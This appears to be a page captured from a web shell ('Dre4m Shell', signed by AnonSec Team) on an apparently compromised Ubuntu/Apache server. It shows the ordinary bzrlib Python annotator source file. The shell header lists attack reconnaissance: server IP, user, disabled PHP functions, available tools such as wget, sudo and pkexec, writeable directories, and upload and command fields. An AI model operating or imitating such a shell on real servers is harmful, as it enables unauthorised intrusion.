Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 3.148.168.26
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python2.7/dist-packages/bzrlib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/python2.7/dist-packages/bzrlib/_annotator_py.py
# Copyright (C) 2009, 2010 Canonical Ltd
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA

"""Functionality for doing annotations in the 'optimal' way"""

from __future__ import absolute_import

from bzrlib.lazy_import import lazy_import
lazy_import(globals(), """
from bzrlib import (
    annotate, # Must be lazy to avoid circular importing
    graph as _mod_graph,
    patiencediff,
    )
""")
from bzrlib import (
    errors,
    osutils,
    ui,
    )


class Annotator(object):
    """Class that drives performing annotations."""

    def __init__(self, vf):
        """Create a new Annotator from a VersionedFile."""
        self._vf = vf
        self._parent_map = {}
        self._text_cache = {}
        # Map from key => number of nexts that will be built from this key
        self._num_needed_children = {}
        self._annotations_cache = {}
        self._heads_provider = None
        self._ann_tuple_cache = {}

    def _update_needed_children(self, key, parent_keys):
        for parent_key in parent_keys:
            if parent_key in self._num_needed_children:
                self._num_needed_children[parent_key] += 1
            else:
                self._num_needed_children[parent_key] = 1

    def _get_needed_keys(self, key):
        """Determine the texts we need to get from the backing vf.

        :return: (vf_keys_needed, ann_keys_needed)
            vf_keys_needed  These are keys that we need to get from the vf
            ann_keys_needed Texts which we have in self._text_cache but we
                            don't have annotations for. We need to yield these
                            in the proper order so that we can get proper
                            annotations.
        """
        parent_map = self._parent_map
        # We need 1 extra copy of the node we will be looking at when we are
        # done
        self._num_needed_children[key] = 1
        vf_keys_needed = set()
        ann_keys_needed = set()
        needed_keys = set([key])
        while needed_keys:
            parent_lookup = []
            next_parent_map = {}
            for key in needed_keys:
                if key in self._parent_map:
                    # We don't need to lookup this key in the vf
                    if key not in self._text_cache:
                        # Extract this text from the vf
                        vf_keys_needed.add(key)
                    elif key not in self._annotations_cache:
                        # We do need to annotate
                        ann_keys_needed.add(key)
                        next_parent_map[key] = self._parent_map[key]
                else:
                    parent_lookup.append(key)
                    vf_keys_needed.add(key)
            needed_keys = set()
            next_parent_map.update(self._vf.get_parent_map(parent_lookup))
            for key, parent_keys in next_parent_map.iteritems():
                if parent_keys is None: # No graph versionedfile
                    parent_keys = ()
                    next_parent_map[key] = ()
                self._update_needed_children(key, parent_keys)
                needed_keys.update([key for key in parent_keys
                                         if key not in parent_map])
            parent_map.update(next_parent_map)
            # _heads_provider does some graph caching, so it is only valid while
            # self._parent_map hasn't changed
            self._heads_provider = None
        return vf_keys_needed, ann_keys_needed

    def _get_needed_texts(self, key, pb=None):
        """Get the texts we need to properly annotate key.

        :param key: A Key that is present in self._vf
        :return: Yield (this_key, text, num_lines)
            'text' is an opaque object that just has to work with whatever
            matcher object we are using. Currently it is always 'lines' but
            future improvements may change this to a simple text string.
        """
        keys, ann_keys = self._get_needed_keys(key)
        if pb is not None:
            pb.update('getting stream', 0, len(keys))
        stream  = self._vf.get_record_stream(keys, 'topological', True)
        for idx, record in enumerate(stream):
            if pb is not None:
                pb.update('extracting', 0, len(keys))
            if record.storage_kind == 'absent':
                raise errors.RevisionNotPresent(record.key, self._vf)
            this_key = record.key
            lines = osutils.chunks_to_lines(record.get_bytes_as('chunked'))
            num_lines = len(lines)
            self._text_cache[this_key] = lines
            yield this_key, lines, num_lines
        for key in ann_keys:
            lines = self._text_cache[key]
            num_lines = len(lines)
            yield key, lines, num_lines

    def _get_parent_annotations_and_matches(self, key, text, parent_key):
        """Get the list of annotations for the parent, and the matching lines.

        :param text: The opaque value given by _get_needed_texts
        :param parent_key: The key for the parent text
        :return: (parent_annotations, matching_blocks)
            parent_annotations is a list as long as the number of lines in
                parent
            matching_blocks is a list of (parent_idx, text_idx, len) tuples
                indicating which lines match between the two texts
        """
        parent_lines = self._text_cache[parent_key]
        parent_annotations = self._annotations_cache[parent_key]
        # PatienceSequenceMatcher should probably be part of Policy
        matcher = patiencediff.PatienceSequenceMatcher(None,
            parent_lines, text)
        matching_blocks = matcher.get_matching_blocks()
        return parent_annotations, matching_blocks

    def _update_from_first_parent(self, key, annotations, lines, parent_key):
        """Reannotate this text relative to its first parent."""
        (parent_annotations,
         matching_blocks) = self._get_parent_annotations_and_matches(
                                key, lines, parent_key)

        for parent_idx, lines_idx, match_len in matching_blocks:
            # For all matching regions we copy across the parent annotations
            annotations[lines_idx:lines_idx + match_len] = \
                parent_annotations[parent_idx:parent_idx + match_len]

    def _update_from_other_parents(self, key, annotations, lines,
                                   this_annotation, parent_key):
        """Reannotate this text relative to a second (or more) parent."""
        (parent_annotations,
         matching_blocks) = self._get_parent_annotations_and_matches(
                                key, lines, parent_key)

        last_ann = None
        last_parent = None
        last_res = None
        # TODO: consider making all annotations unique and then using 'is'
        #       everywhere. Current results claim that isn't any faster,
        #       because of the time spent deduping
        #       deduping also saves a bit of memory. For NEWS it saves ~1MB,
        #       but that is out of 200-300MB for extracting everything, so a
        #       fairly trivial amount
        for parent_idx, lines_idx, match_len in matching_blocks:
            # For lines which match this parent, we will now resolve whether
            # this parent wins over the current annotation
            ann_sub = annotations[lines_idx:lines_idx + match_len]
            par_sub = parent_annotations[parent_idx:parent_idx + match_len]
            if ann_sub == par_sub:
                continue
            for idx in xrange(match_len):
                ann = ann_sub[idx]
                par_ann = par_sub[idx]
                ann_idx = lines_idx + idx
                if ann == par_ann:
                    # Nothing to change
                    continue
                if ann == this_annotation:
                    # Originally claimed 'this', but it was really in this
                    # parent
                    annotations[ann_idx] = par_ann
                    continue
                # Resolve the fact that both sides have a different value for
                # last modified
                if ann == last_ann and par_ann == last_parent:
                    annotations[ann_idx] = last_res
                else:
                    new_ann = set(ann)
                    new_ann.update(par_ann)
                    new_ann = tuple(sorted(new_ann))
                    annotations[ann_idx] = new_ann
                    last_ann = ann
                    last_parent = par_ann
                    last_res = new_ann

    def _record_annotation(self, key, parent_keys, annotations):
        self._annotations_cache[key] = annotations
        for parent_key in parent_keys:
            num = self._num_needed_children[parent_key]
            num -= 1
            if num == 0:
                del self._text_cache[parent_key]
                del self._annotations_cache[parent_key]
                # Do we want to clean up _num_needed_children at this point as
                # well?
            self._num_needed_children[parent_key] = num

    def _annotate_one(self, key, text, num_lines):
        this_annotation = (key,)
        # Note: annotations will be mutated by calls to _update_from*
        annotations = [this_annotation] * num_lines
        parent_keys = self._parent_map[key]
        if parent_keys:
            self._update_from_first_parent(key, annotations, text,
                                           parent_keys[0])
            for parent in parent_keys[1:]:
                self._update_from_other_parents(key, annotations, text,
                                                this_annotation, parent)
        self._record_annotation(key, parent_keys, annotations)

    def add_special_text(self, key, parent_keys, text):
        """Add a specific text to the graph.

        This is used to add a text which is not otherwise present in the
        versioned file. (eg. a WorkingTree injecting 'current:' into the
        graph to annotate the edited content.)

        :param key: The key to use to request this text be annotated
        :param parent_keys: The parents of this text
        :param text: A string containing the content of the text
        """
        self._parent_map[key] = parent_keys
        self._text_cache[key] = osutils.split_lines(text)
        self._heads_provider = None

    def annotate(self, key):
        """Return annotated fulltext for the given key.

        :param key: A tuple defining the text to annotate
        :return: ([annotations], [lines])
            annotations is a list of tuples of keys, one for each line in lines
                        each key is a possible source for the given line.
            lines the text of "key" as a list of lines
        """
        pb = ui.ui_factory.nested_progress_bar()
        try:
            for text_key, text, num_lines in self._get_needed_texts(key, pb=pb):
                self._annotate_one(text_key, text, num_lines)
        finally:
            pb.finished()
        try:
            annotations = self._annotations_cache[key]
        except KeyError:
            raise errors.RevisionNotPresent(key, self._vf)
        return annotations, self._text_cache[key]

    def _get_heads_provider(self):
        if self._heads_provider is None:
            self._heads_provider = _mod_graph.KnownGraph(self._parent_map)
        return self._heads_provider

    def _resolve_annotation_tie(self, the_heads, line, tiebreaker):
        if tiebreaker is None:
            head = sorted(the_heads)[0]
        else:
            # Backwards compatibility, break up the heads into pairs and
            # resolve the result
            next_head = iter(the_heads)
            head = next_head.next()
            for possible_head in next_head:
                annotated_lines = ((head, line), (possible_head, line))
                head = tiebreaker(annotated_lines)[0]
        return head

    def annotate_flat(self, key):
        """Determine the single-best-revision to source for each line.

        This is meant as a compatibility thunk to how annotate() used to work.
        :return: [(ann_key, line)]
            A list of tuples with a single annotation key for each line.
        """
        custom_tiebreaker = annotate._break_annotation_tie
        annotations, lines = self.annotate(key)
        out = []
        heads = self._get_heads_provider().heads
        append = out.append
        for annotation, line in zip(annotations, lines):
            if len(annotation) == 1:
                head = annotation[0]
            else:
                the_heads = heads(annotation)
                if len(the_heads) == 1:
                    for head in the_heads: break # get the item out of the set
                else:
                    head = self._resolve_annotation_tie(the_heads, line,
                                                        custom_tiebreaker)
            append((head, line))
        return out

Anon7 - 2022
AnonSec Team